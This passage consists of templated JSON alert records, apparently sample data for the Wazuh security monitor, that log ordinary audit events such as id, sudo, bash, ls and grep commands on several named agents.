/usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: 